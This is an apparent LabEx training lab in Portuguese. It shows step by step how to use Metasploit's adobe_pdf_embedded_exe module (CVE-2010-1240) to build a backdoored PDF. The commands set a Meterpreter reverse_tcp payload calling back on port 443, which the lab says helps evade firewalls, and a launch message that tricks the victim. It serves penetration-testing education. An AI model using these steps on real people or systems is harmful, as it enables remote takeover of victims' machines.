Injetar Backdoor do Windows em PDF Adobe no Nmap

NmapBeginner
Pratique Agora

Introdução

Neste laboratório, exploraremos como aproveitar a vulnerabilidade do módulo embutido no Adobe PDF para injetar um backdoor no Windows. O processo do laboratório envolve a transmissão de um arquivo PDF contendo um backdoor para um host Windows, que infectará o sistema Windows alvo quando o proprietário abrir o arquivo PDF usando o Adobe Reader.

O ambiente de laboratório fornecido pela LabEx não possui uma máquina virtual Windows, portanto, não podemos verificar a eficácia do ataque. O processo do laboratório demonstrará apenas como embutir o programa backdoor.

Além disso, você não precisa iniciar uma máquina alvo neste laboratório. Você só precisa iniciar o ambiente Kali Linux, e o arquivo PDF criado com sucesso será colocado no diretório /root/ do host Kali.

Iniciar o Console do Metasploit Framework

Agora você iniciará a máquina de ataque (container Kali Linux) e a máquina alvo (máquina virtual Metasploitable2) para o experimento.

  1. Abra um terminal xfce na máquina host LabEx e inicie o alvo Metasploitable2 executando o seguinte comando:
sudo virsh start Metasploitable2

Aguarde o início da máquina alvo, pode levar de 1 a 3 minutos.

  1. Teste a conectividade com a máquina alvo fazendo ping nela:
ping 192.168.122.102

Pressione Ctrl+C para parar o ping.

  1. Inicie o container Kali Linux e entre no ambiente bash executando:
docker run -ti --network host b5b709a49cd5 bash
  1. Dentro do container Kali, teste a conexão de rede com a máquina alvo:
ping 192.168.122.102

Pressione Ctrl+C para parar o ping.

Agora, tanto a máquina de ataque quanto a máquina alvo estão em execução, e você pode iniciar o teste de penetração.

Observação: Se você sair acidentalmente do bash atual, o container Kali será interrompido automaticamente. Você pode executar docker run -ti --network host b5b709a49cd5 bash novamente no host para iniciar um novo container Kali e entrar no bash para continuar o experimento.

No container Kali Linux, insira os seguintes comandos no terminal bash do Kali Linux:

service postgresql start
msfdb init
cd ~
msfconsole

Isso iniciará o serviço de banco de dados PostgreSQL, inicializará o banco de dados e iniciará o Console do Metasploit Framework (msfconsole) para operações adicionais.

Usar o Módulo de Exploit

No msfconsole, execute o seguinte comando para usar o módulo exploit:

use exploit/windows/fileformat/adobe_pdf_embedded_exe

Isso carregará o módulo exploit adobe_pdf_embedded_exe, que nos permite embutir uma carga útil executável em um arquivo PDF.

Use o comando show options para visualizar as opções configuráveis para o módulo exploit:

show options

Isso exibirá as opções disponíveis, como:

  • EXENAME: O caminho para o arquivo executável a ser embutido no PDF.
  • FILENAME: O nome do arquivo PDF de saída (padrão: evil.pdf).
  • INFILENAME: O caminho completo para o arquivo PDF de entrada (padrão: um arquivo PDF embutido).
  • LAUNCH_MESSAGE: A mensagem de prompt para enganar o usuário a executar o executável embutido.

Você pode deixar a maioria das opções com seus valores padrão, mas pode querer definir a opção INFILENAME para especificar o caminho para o arquivo PDF de entrada que você deseja infectar.

Após configurar as opções, use o comando exploit para executar o ataque:

exploit

Isso embutirá a carga útil no arquivo PDF de entrada especificado e gerará um novo arquivo PDF com o executável embutido.

Pressione Ctrl+D para sair do console Metasploit e, em seguida, iniciar a inspeção

Examinar a Saída

Após executar o exploit, o arquivo PDF gerado contendo a carga útil maliciosa estará localizado em /root/.msf4/local/evil.pdf. Você pode sair do msfconsole e examinar o arquivo:

ls -l /root/.msf4/local/evil.pdf

Você deve observar um aumento no tamanho do arquivo, indicando a presença do executável embutido. Quando o arquivo PDF for aberto, ele exibirá a mensagem de lançamento configurada, solicitando que o usuário clique e execute o programa embutido.

Definir um Payload Personalizado

Para tornar o PDF infectado mais valioso, podemos definir uma carga útil personalizada para ele.

Reentre no msfconsole:

cd ~
msfconsole

No msfconsole, siga os passos anteriores para selecionar o módulo de ataque:

use exploit/windows/fileformat/adobe_pdf_embedded_exe

Desta vez, usaremos a carga útil windows/meterpreter/reverse_tcp, que é um backdoor Meterpreter que estabelece uma conexão TCP do host comprometido de volta para a máquina do atacante, permitindo acesso direto ao sistema comprometido. Você pode usar o comando show payloads para visualizar e selecionar outras cargas úteis, se desejar.

Defina a carga útil windows/meterpreter/reverse_tcp:

set payload windows/meterpreter/reverse_tcp

Configure a carga útil especificando o endereço IP e a porta do seu host Kali para receber a conexão de entrada. Certifique-se de que o host de destino possa se conectar ao seu host Kali:

set lhost 192.168.122.1

Usar a porta 443 pode ajudar a contornar alguns firewalls:

set lport 443

Em seguida, use o comando exploit para gerar o PDF malicioso:

exploit

Pressione Ctrl+D para sair do console Metasploit e, em seguida, iniciar a inspeção

Examinar a Saída Novamente

Verifique o tamanho do arquivo PDF gerado:

ls -l /root/.msf4/local/evil.pdf

Você deve notar que o tamanho do arquivo é menor do que com a carga útil padrão, pois a carga útil windows/meterpreter/reverse_tcp é mais compacta.

Resumo

Neste laboratório, aprendemos como aproveitar a vulnerabilidade do Adobe Reader (CVE-2010-1240) que falha ao validar o conteúdo embutido em arquivos PDF. Ao embutir um programa backdoor em um arquivo PDF e enganar o usuário para que o execute, podemos obter acesso ao host Windows de destino. Os principais pontos abordados neste laboratório incluem:

  • Comandos básicos do Linux
  • Operações do console do Metasploit Framework
  • Introdução à vulnerabilidade Adobe PDF Embedded EXE (CVE-2010-1240)
  • Como explorar a vulnerabilidade e embutir um programa backdoor

O laboratório proporcionou experiência prática na criação de arquivos PDF maliciosos com cargas úteis embutidas, na configuração de diferentes opções e na compreensão do impacto de diferentes cargas úteis no tamanho do arquivo. Este conhecimento pode ser útil para entender e mitigar tais ataques em cenários do mundo real.